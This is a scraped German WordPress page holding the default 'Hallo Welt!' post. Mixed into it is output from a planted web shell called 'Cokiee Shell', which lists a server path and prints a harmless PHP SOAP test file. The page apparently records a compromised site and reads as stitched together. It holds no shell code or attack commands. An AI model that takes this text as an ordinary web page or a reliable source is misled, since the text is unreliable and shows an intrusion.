Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/ext/soap/tests/interop/Round3/GroupE/ |
Current File : //usr/local/src/php7/php-7.0.5/ext/soap/tests/interop/Round3/GroupE/round3_groupE_list.inc |
<?php class SOAP_Interop_GroupE { function echoLinkedList($inputList) { global $d; $d = $inputList; return $inputList; } } $server = new SoapServer(dirname(__FILE__)."/round3_groupE_list.wsdl"); $server->setClass("SOAP_Interop_GroupE"); $server->handle($HTTP_RAW_POST_DATA); var_dump($d); ?>
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare